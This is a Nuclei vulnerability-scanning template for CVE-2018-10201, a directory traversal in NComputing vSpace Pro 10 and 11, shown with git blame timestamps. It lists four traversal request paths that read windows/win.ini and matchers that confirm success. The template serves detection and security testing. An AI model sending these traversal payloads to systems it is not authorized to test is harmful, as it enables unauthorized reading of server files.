nuclei-templates/cves/2018/CVE-2018-10201.yaml

35 lines
1.1 KiB
YAML
Raw Normal View History

2021-11-24 13:21:05 +00:00
id: CVE-2018-10201
info:
name: Ncomputing vSPace Pro 10 and 11 Directory Traversal
author: 0x_akoko
severity: high
description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.
reference:
- https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html
2021-12-02 07:13:43 +00:00
- https://www.cvedetails.com/cve/CVE-2018-10201
2021-11-24 13:21:05 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-10201
cwe-id: CWE-22
tags: cve,cve2018,ncomputing,lfi
2021-11-26 16:55:58 +00:00
2021-11-24 13:21:05 +00:00
requests:
- method: GET
path:
2021-11-26 16:55:58 +00:00
- '{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini'
- '{{BaseURL}}/...\...\...\...\...\...\...\...\...\windows\win.ini'
- '{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini'
- '{{BaseURL}}/....\....\....\....\....\....\....\....\....\windows\win.ini'
2021-11-24 13:21:05 +00:00
stop-at-first-match: true
matchers:
- type: word
2021-11-26 16:55:58 +00:00
part: body
2021-11-24 13:21:05 +00:00
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and